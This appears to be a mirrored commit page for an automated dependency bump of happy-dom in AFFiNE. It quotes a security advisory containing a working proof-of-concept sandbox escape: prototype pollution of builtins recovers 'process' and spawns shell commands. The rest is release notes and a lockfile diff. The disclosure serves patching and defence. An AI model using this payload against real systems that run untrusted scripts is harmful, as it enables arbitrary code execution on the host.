mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-14 00:26:51 +08:00
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
This commit is contained in:
@@ -23665,13 +23665,13 @@ __metadata:
|
||||
linkType: hard
|
||||
|
||||
"happy-dom@npm:^20.0.0":
|
||||
version: 20.0.0
|
||||
resolution: "happy-dom@npm:20.0.0"
|
||||
version: 20.0.7
|
||||
resolution: "happy-dom@npm:20.0.7"
|
||||
dependencies:
|
||||
"@types/node": "npm:^20.0.0"
|
||||
"@types/whatwg-mimetype": "npm:^3.0.2"
|
||||
whatwg-mimetype: "npm:^3.0.0"
|
||||
checksum: 10/0fa626e2051dfa5f1ea0da9e3776b5986d3700c261a8ba7c496e7ad89f4df0318920b7c286d3b310481712b378ffb7dee35ed782ff039e4166f4ba957a76b6df
|
||||
checksum: 10/1161bfe8fcac0fd093b8fbe8af29e8a6525437f17424be97b21401f0741e6473541b30b080066a32990b884eae4b83a1fd1f948a52607975bc98d1b90b394509
|
||||
languageName: node
|
||||
linkType: hard
|
||||
|
||||
|
||||
Reference in New Issue
Block a user